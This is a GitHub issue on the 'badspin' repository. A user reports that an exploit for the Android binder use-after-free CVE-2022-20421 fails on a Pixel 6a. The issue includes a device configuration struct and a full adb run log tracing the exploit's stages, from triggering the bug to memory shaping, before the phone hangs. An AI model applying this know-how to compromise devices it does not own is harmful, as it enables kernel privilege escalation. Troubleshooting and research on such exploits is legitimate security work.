Pixel 6A... Failed ! - Githubissues

Device = Pixel 6A Build Number = SD2A.220123.051.A3 Android = 12 Kernel = 5.10.66 Security Patch = 4/2022

// dev_config.h
{
        /* BlueJay 12.0.0 (SD2A.220123.051.A3, Apr 2022) */
        .name = "Google Pixel 6a",
        .model = "Pixel 6a",
        .android_version = 12,
        .android_security_patch.year = 2022,
        .android_security_patch.month = 4,
        .kernel_version = KERNEL_VERSION(5, 10, 66),
        .kimg_to_lm = pixel_kimg_to_lm,
        .find_kbase = noop_kbase,
}

bluejay:/ $ uname -a
Linux localhost 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022 aarch64

output from adb shell

==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
==========================================
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[7029:7029] New binder client: A
[7031:7031] New binder client: C
[7030:7030] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish. 
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
    Testing ptmx 0 (fd 4)
        Reading ptmx 0
    Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
    Joining blocker threads...
    All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[pipe_process:7086] Pinned to CPU 0
[graveyard_process] pid = 7085
[pipe_process:7089] Pinned to CPU 3
[pipe_process:7088] Pinned to CPU 2
[pipe_process:7090] Pinned to CPU 4
[pipe_process:7087] Pinned to CPU 1
[pipe_process:7094] Pinned to CPU 7
[pipe_process:7093] Pinned to CPU 6
[pipe_process:7091] Pinned to CPU 5
[fd_master_process] pid = 7095
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:7151] 30000 files sprayed
[shaper_process:7149] 30000 files sprayed
[shaper_process:7152] 30000 files sprayed
[shaper_process:7150] 30000 files sprayed
[shaper_process:7153] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=7154
[timer_master_process] Wait for C to enter spin_lock()
[7156:7156] New binder client: B
[7159:7159] New binder client: C
[7155:7155] New binder client: A
C: lookup A => handle = 2
A: lookup B => handle = 2
B: Searching for magic badcab1ebadcab1e....
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish. 
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev))

It stuck on this and if I force close (Ctrl+C) the command the phone stuck on screen and after few secondes it's freeze so I need to force shutdown with button combo.

0xkol / badspin

Pixel 6A... Failed ! #5